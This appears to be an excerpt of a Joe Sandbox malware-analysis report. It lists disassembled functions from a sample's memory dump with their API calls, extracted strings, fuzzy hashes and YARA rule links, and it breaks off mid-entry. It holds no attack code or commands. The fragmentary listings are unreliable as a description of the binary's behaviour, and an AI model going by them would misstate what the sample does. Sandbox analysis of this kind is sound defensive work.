Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: d795d66bfaa9dbce0c7b5768b2e4f3e6422da9f0b29917a0f11d17a3496e3be1
Instruction ID: 7fafcaf618f5280e2f28e045ab0e568bb185da09cc95b93301deed207418c481
Opcode Fuzzy Hash: d795d66bfaa9dbce0c7b5768b2e4f3e6422da9f0b29917a0f11d17a3496e3be1
Instruction Fuzzy Hash: 0A419271900254EFCB28DF54D841BAEB7B4FB54B10F14816FEA0AAB391DB30AD06CB90

Function 00CF0D0B Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00CF0D23

Part of subcall function 00CE8006: HeapFree.KERNEL32(00000000,00000000,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?), ref: 00CE801C
Part of subcall function 00CE8006: GetLastError.KERNEL32(?,?,00CF0FAC,?,00000000,?,8B18EC83,?,00CF124F,?,00000007,?,?,00CF16F4,?,?), ref: 00CE802E

_free.LIBCMT ref: 00CF0D35
_free.LIBCMT ref: 00CF0D47
_free.LIBCMT ref: 00CF0D59
_free.LIBCMT ref: 00CF0D6B

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 349cc54c63f323b0e62f9ca44422c0066dcb37988c6d424b870861ed58086861
Instruction ID: 6172e614d930bc7e3b9cdeeef9ff3aef918a242940b8fcf740030a84ebc36984
Opcode Fuzzy Hash: 349cc54c63f323b0e62f9ca44422c0066dcb37988c6d424b870861ed58086861
Instruction Fuzzy Hash: CAF09036500344BB8674EBA9E882C6A73EEEA00B107744C09F52CE7712CF34FC849A64

Function 00CC9560 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 284sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710,79C85444,00000000,?), ref: 00CC9599

Part of subcall function 00CBA470: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,79C85444,00000000,?), ref: 00CBA4BA

GetFileAttributesA.KERNEL32(?,?,00000000,00000000,00D17494,0000000E), ref: 00CC9615

Strings

1F==, xrefs: 00CC9882, 00CCAF0B
3Lrq, xrefs: 00CC9848, 00CC9E32, 00CC9E79

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: AttributesFileFolderPathSleep
String ID: 1F==$3Lrq
API String ID: 70540035-3568642885
Opcode ID: bc813d2dc8cc56818a7416425da409d62e48c8558eda376125a75060ac2bccc8
Instruction ID: 0ed5ad0fc19d9a919934ec067baecbe521a342d684085c0e67eacc320e873000
Opcode Fuzzy Hash: bc813d2dc8cc56818a7416425da409d62e48c8558eda376125a75060ac2bccc8
Instruction Fuzzy Hash: F5C1AE70D0428CEFEF14DBA8C948BDDBFB6EF05304F208199D4096B292D7B55A89DB61

Function 00CC4DD5 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00CC4FA6
CloseHandle.KERNEL32(00D19BCC), ref: 00CC4FB1

Strings

246122658369, xrefs: 00CC4F44
3Iy=, xrefs: 00CC4F2A

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: CloseHandleclosesocket
String ID: 246122658369$3Iy=
API String ID: 2025136489-1909603735
Opcode ID: 8285b1dd2b0e5bf62a8082148e6dfe2596f3cce1756c6d514eac134dfc4a74cb
Instruction ID: 8d55a56bde58156c6095ae87386729b6630025bfaaffb6700a45c2531d11efca
Opcode Fuzzy Hash: 8285b1dd2b0e5bf62a8082148e6dfe2596f3cce1756c6d514eac134dfc4a74cb
Instruction Fuzzy Hash: 9E710671610144ABEB0CEF38CD8AB9DBF62EB85354F50821DF815877C6DB39DA818792

Function 00CEEED2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00CEF06C

Strings

*?, xrefs: 00CEEF15

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: d46e50ce1e427859c04948455d3f7a9b31efb8b2ea13eb9e83b8e7b3112f7b33
Instruction ID: fab32dc9815cf9556044e469a4d176cfdc9b1218ed472940cc5132306b08752f
Opcode Fuzzy Hash: d46e50ce1e427859c04948455d3f7a9b31efb8b2ea13eb9e83b8e7b3112f7b33
Instruction Fuzzy Hash: 9C614E76E002599FCB24CFA9C8819EDFBF5EF48350B25816AE815F7301D671AE418B90

Function 00CB4910 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00CB499F

Part of subcall function 00CDAEA6: RaiseException.KERNEL32(E06D7363,00000001,00000003,00CB25DC,00CD0B87,8B18EC83,?,00CB25DC,?,00D1450C), ref: 00CDAF06

Strings

ios_base::eofbit set, xrefs: 00CB4954
ios_base::badbit set, xrefs: 00CB4945
ios_base::failbit set, xrefs: 00CB494F

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 7d22bcd32029a7d564332532bd9edc4f3cdeda461ed5c57a74446d54e117644b
Instruction ID: f36b34566dad6482047d4c3b268dbc39b1157e5e793b9b8c6e7e77fcd729cee8
Opcode Fuzzy Hash: 7d22bcd32029a7d564332532bd9edc4f3cdeda461ed5c57a74446d54e117644b
Instruction Fuzzy Hash: 8F11E1B1904305ABC714DB58C802B97B7E9AF51310F14862AF96887682EB70E914CB62

Function 00CE9015 Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00CE909F

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a747bd915aba6517dd4d41587f6b2d132dafeedf1d0584c430e1709dc9ca69dd
Instruction ID: 2b0b3e9147d69aba9da663a3090c18bffcfe571c04f221843259eec7be6573dd
Opcode Fuzzy Hash: a747bd915aba6517dd4d41587f6b2d132dafeedf1d0584c430e1709dc9ca69dd
Instruction Fuzzy Hash: 08B134329002C6AFDF11CF6AC881BAEBBF5EF55300F24416AE955EB342D6349E41CB61

Function 00CDC91B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00CDC9E2
___AdjustPointer.LIBCMT ref: 00CDCA05
___AdjustPointer.LIBCMT ref: 00CDCAA1

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: d31cd9f415c95f7dddbe9a152a25d0819b127e3d6c7b0267b8700e604375e236
Instruction ID: 869f259e1fc4b2354806007dd187a3208b0ad7de03b8855de8ad684a825c8c91
Opcode Fuzzy Hash: d31cd9f415c95f7dddbe9a152a25d0819b127e3d6c7b0267b8700e604375e236
Instruction Fuzzy Hash: 6851D4B2A0520BAFDB25DF14D8C1B6AB7A4EF40300F14451FEA1997791D731EE50EB90

Function 00CD5C70 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00CD5D47
std::_Rethrow_future_exception.LIBCPMT ref: 00CD5D99
std::_Rethrow_future_exception.LIBCPMT ref: 00CD5DA9

Part of subcall function 00CB3A60: __Mtx_unlock.LIBCPMT ref: 00CB3B54

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Mtx_unlockRethrow_future_exceptionstd::_
String ID:
API String ID: 3298230783-0
Opcode ID: 1a881f6881cada3371465db55fa132714ef03acef3f37f367a267aa143dc9f08
Instruction ID: 196bc3a402ebfbad12811b71112d728322e8f7dea125a3feb10df768ba52686b
Opcode Fuzzy Hash: 1a881f6881cada3371465db55fa132714ef03acef3f37f367a267aa143dc9f08
Instruction Fuzzy Hash: F0412971D007486FDB24EBA4D845BAEBBB89F05300F00452FE65253742EB30A648D7B2

Function 00CDE906 Relevance: 6.1, APIs: 4, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3b1ee0a27f4b2162a03b95ffb76b5322c5fada237a95bc7577a0c6ca35e57c6
Instruction ID: 343d646efd57b5308f9454c408d449b118a556d8f8f45f4a62e3488d1e1791cd
Opcode Fuzzy Hash: d3b1ee0a27f4b2162a03b95ffb76b5322c5fada237a95bc7577a0c6ca35e57c6
Instruction Fuzzy Hash: 6941F872A00754AFE725BF78CC55BAABBA9EB44710F10862FF615DF381D271EA409780

Function 00CF6FDE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00CF70AE
_free.LIBCMT ref: 00CF70D7
SetEndOfFile.KERNEL32(00000000,00CF383D,00000000,00CE7241,?,?,?,?,?,?,?,00CF383D,00CE7241,00000000), ref: 00CF7109
GetLastError.KERNEL32(?,?,?,?,?,?,?,00CF383D,00CE7241,00000000,?,?,?,?,00000000), ref: 00CF7125

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: dcd9e96780adda367509692b7d07cf2bfdff02e0f02a9ae852072eb4fd55c92f
Instruction ID: 29f41a11ac8af78e53963b77b1fb789caa4212d2eda02968460f9abe4a5b0986
Opcode Fuzzy Hash: dcd9e96780adda367509692b7d07cf2bfdff02e0f02a9ae852072eb4fd55c92f
Instruction Fuzzy Hash: C3412B725042899BDB61ABB9CC42BBD3776AF44360F240710FA24E7292DF34DE949763

Function 00CB2F00 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00CB2F9F
GetCurrentThreadId.KERNEL32 ref: 00CB2FAB
__Mtx_unlock.LIBCPMT ref: 00CB2FF2
__Cnd_broadcast.LIBCPMT ref: 00CB2FFB

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThread
String ID:
API String ID: 3264154886-0
Opcode ID: fff9b369f32744df9207391bc20e8f26f044f5b860aa229c6aaaa2d0318d064a
Instruction ID: fce25ede9411418c3d50d0152a63fdab79feaf7f7362e4b2e1b9b3d5f25a268a
Opcode Fuzzy Hash: fff9b369f32744df9207391bc20e8f26f044f5b860aa229c6aaaa2d0318d064a
Instruction Fuzzy Hash: 04419C71A016159FCB11EB64D840BAAB7F8FF18314F04466AE92AC7781EB35EA04DBC1

Function 00CEEE03 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00CDE7A8: _free.LIBCMT ref: 00CDE7B6

Part of subcall function 00CEE2AF: WideCharToMultiByte.KERNEL32(00000000,00000000,8B18EC83,?,00000000,8B18EC83,00CE7F47,0000FDE9,8B18EC83,?,?,?,00CE7CC0,0000FDE9,00000000,?), ref: 00CEE35B

GetLastError.KERNEL32 ref: 00CEEE6B
__dosmaperr.LIBCMT ref: 00CEEE72
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00CEEEB1
__dosmaperr.LIBCMT ref: 00CEEEB8

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: a67446d926d19fcd4f282a5c74c9b5063d9b06a946dd90b0b79bee71d9a50e97
Instruction ID: 77e11e56bd45c8be02502da55a575f2ac485d74fd5caaeb8ae7222f2e73d3268
Opcode Fuzzy Hash: a67446d926d19fcd4f282a5c74c9b5063d9b06a946dd90b0b79bee71d9a50e97
Instruction Fuzzy Hash: 2D21D4716002D6AFEB20AF778C81D6BB7ADEF043A47104619F969D7260D731ED5097A0

Function 00CE6C20 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,?,00CE7A07,?,00000000,00000000,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010), ref: 00CE6C25
_free.LIBCMT ref: 00CE6C82
_free.LIBCMT ref: 00CE6CB8
SetLastError.KERNEL32(00000000,00000006,000000FF,?,00CE7EC1,00000000,00000000,00000000,00000000,8B18EC83,00D14198,00000010,00CE0F62,00000000,00000000,00000000), ref: 00CE6CC3

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8b43f06faf0bb5ec2bfacb1832057250c1467392620a25a259dbf72d6852a3fa
Instruction ID: 86945844573dfaae0de7a418e8bc1952a379326976e9001d50f0245f678c248b
Opcode Fuzzy Hash: 8b43f06faf0bb5ec2bfacb1832057250c1467392620a25a259dbf72d6852a3fa
Instruction Fuzzy Hash: 4D11C6362543C13AD611667BAC8596B355ADBD03F57350334F2B8D22E2DD75CC4A6134

Function 00CD7EB8 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00CD7E19: GetModuleHandleExW.KERNEL32(00000002,00000000,00000000,?,?,00CD7E6B,00000014,?,00CD7EAC,00000014,?,00CB2D32,00000000,00000014,00000000,79C85444), ref: 00CD7E25

__Mtx_unlock.LIBCPMT ref: 00CD7EFE
FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,79C85444,?,?,?,Function_000486E0,000000FF), ref: 00CD7F26
__Mtx_unlock.LIBCPMT ref: 00CD7F61
__Cnd_broadcast.LIBCPMT ref: 00CD7F72

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: Mtx_unlock$CallbackCnd_broadcastFreeHandleLibraryModuleReturnsWhen
String ID:
API String ID: 420990631-0
Opcode ID: 6c31530297ed4bfd6756fbea4ccbfefea8da1385b3adae197537a9e061641095
Instruction ID: fcf6e1788ff097252e5eae7cfe825a2a82c058ab7b9b36f6cd9c4120a0a42b96
Opcode Fuzzy Hash: 6c31530297ed4bfd6756fbea4ccbfefea8da1385b3adae197537a9e061641095
Instruction Fuzzy Hash: B711E976908310ABCB217BA1EC02B6F7769EF04B20F00491BFA15D3791DF35D901D661

Function 00CE6D77 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00CD0B87,00CD0B87,8B18EC83,00CE10B7,00CE8278,?,?,00CD9C1F,00CD0B87,?,00CD321E,8B18EC84,75920F00), ref: 00CE6D7C
_free.LIBCMT ref: 00CE6DD9
_free.LIBCMT ref: 00CE6E0F
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00CD9C1F,00CD0B87,?,00CD321E,8B18EC84,75920F00), ref: 00CE6E1A

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 21711ad823e0ccecf7ddae04fc81ea8f1965d3e41e6e050793d66ae9d52d1621
Instruction ID: 2bc0d28f7ba1af7842d884c5310cf8dbb2df8ecfb34aade3c8ebf344676f2fdd
Opcode Fuzzy Hash: 21711ad823e0ccecf7ddae04fc81ea8f1965d3e41e6e050793d66ae9d52d1621
Instruction Fuzzy Hash: 4811E13A3143803ADA112277AC86EAB355A9BD07B4B250338F138D32E2DE71CD0A6234

Function 00CE9CEF Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00CF57E7,?,?,?,00000020,00000001), ref: 00CE9D05
GetLastError.KERNEL32(?,00CF57E7,?,?,?,00000020,00000001), ref: 00CE9D0F
__dosmaperr.LIBCMT ref: 00CE9D16

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 231553180b11be876cb75f56533994c1a52a34e24e3bc3643ed3722dc60e7e24
Instruction ID: 5f36bdb03e048dc522de11f266f639b011f7615122ad4d60782b05b353a1aada
Opcode Fuzzy Hash: 231553180b11be876cb75f56533994c1a52a34e24e3bc3643ed3722dc60e7e24
Instruction Fuzzy Hash: 02F01D366002A5BBCB206BA7DC08A5BBF69FF487A03148515F62DC7120D731EA61D7E0

Function 00CE9D58 Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00000020,?,?,00000000,?,00000000,?,00CF5772,?,?,?,?,00000020,00000001), ref: 00CE9D6E
GetLastError.KERNEL32(?,00CF5772,?,?,?,?,00000020,00000001), ref: 00CE9D78
__dosmaperr.LIBCMT ref: 00CE9D7F

Memory Dump Source

Source File: 00000000.00000002.4481892397.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000000.00000002.4481872276.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481936743.0000000000D01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481957825.0000000000D16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481976858.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4481998475.0000000000D23000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cb0000_6uHfmjGMfL.jbxd

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: d18512388ffd342288df39428cbfcd5e8d75cc57469327d656fa976045054efc
Instruction ID: d51b78a00c420fa46cfa3dbe5a7b8c36eb3f0e13ee8f3008e062bf219e116855
